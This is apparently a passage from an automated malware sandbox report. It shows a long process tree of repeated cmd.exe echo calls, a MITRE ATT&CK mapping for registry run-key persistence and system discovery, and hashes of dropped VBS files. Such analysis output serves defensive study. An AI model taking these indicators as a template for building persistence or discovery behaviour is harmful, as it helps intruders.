    PID:4772
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:5104
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3572
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4920
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:404
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4388
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4476
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4456
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1020
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:456
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1396
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2788
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3420
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1792
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4144
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1544
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3016
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:260
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3676
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1744
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4704
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1784
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3736
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3008
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1416
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3108
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4844
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4404
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1948
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3604
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2404
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1896
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3984
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1908
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4124
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2312
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3792
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1020
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:920
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3600
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2112
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2788
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1796
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:964
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1516
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1620
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3128
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2900
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1732
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2688
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1828
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4220
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4148
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2088
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3120
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1940
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1056
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1700
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4892
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4040
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2020
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2116
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2856
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2808
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1680
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3964
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2788
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1868
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2492
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3128
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1168
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4904
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3124
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2780
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5024
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4348
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4308
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2652
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3972
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2088
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3120
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1136
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5104
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4268
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3604
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2356
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2212
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3312
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2432
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3396
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2284
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3220
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4628
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3828
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4980
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2492
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4828
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:384
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:5032
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1584
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4112
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3108
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1064
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4440
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:740
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4820
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2244
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2136
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:656
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2936
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1172
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:400
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1020
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1576
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2284
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1792
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4716
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4628
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:556
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1520
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2712
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4156
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1504
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2940
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1312
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1828
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4984
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1536
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4684
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1948
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1696
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4444
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4920
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4040
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1308
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1908
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4580
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2312
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2020
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2012
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4432
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1680
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3220
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4548
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1868
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2796
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4588
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3128
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:224
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1852
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:368
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2780
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4220
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3108
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4308
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1404
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4440
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4200
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4820
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4988
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3948
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2380
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4812
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3076
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:456
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4848
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2932
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3420
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2112
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4700
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3336
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4496
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:556
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3612
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1316
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4344
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:368
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2780
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:5116
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2520
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2652
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2348
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4200
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4820
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1228
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3948
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2380
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2212
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2432
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4584
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1876
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1576
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3348
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:964
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3016
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3880
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3244
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3180
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1316
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4780
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:760
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3636
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4340
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3152
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4844
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4144
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2036
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1940
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1168
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1700

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3d4 0x468
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2016

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4064

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\temp.vbs

Filesize
2KB

MD5
3718febf44ad3b6c18128a455bd697d9

SHA1
448b46eb8911524cbcf8c6e3d54d1a3b368ccebc

SHA256
809680f109e4a3429944f31932bc12b297794e48d3a78c27edbb86551dee5699

SHA512
404a25603f412ed9f5d8b8f64d141650b86d2e64755657fa3405cd6477af1b5147ea27041adc6a031c5b558a904df5ee5ec0d3c3f7b6267f87aa133fc811895f

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp1.vbs

Filesize
111B

MD5
c753d5effda7a1a725a48c72e2b80260

SHA1
563817a150a63a8c171a7252b933efac07c24f8c

SHA256
32ed805bc2ce9ec8d3dac9906be5b3f0c8405bdebcc94e68fbf51dbad603c0f5

SHA512
a1118b0e61a4430a1bc317d83147a5b9abb24df1276d68352b1abf33a10069d22dda6540e84c0063ed052e5beea8386409789848c6fb833052c6eb8d5a744e39

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp2.vbs

Filesize
153B

MD5
6d6a9d68a59b8e24397e145c4a93e27f

SHA1
407aca0e53f9473e58bda9b422f7f9c603e9d509

SHA256
8ce0533b9b83d0066877855426494dd11891a99d2d0636dd79e260deec14bd65

SHA512
7da982f85c3d262e469e235c6219b8406b3fba911e10927e3960cdf430988c4542d1e28fabcb35839d9a8f690219565ac7c301b1706d0b6d8e15d80839cc60ba

Download Submit

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads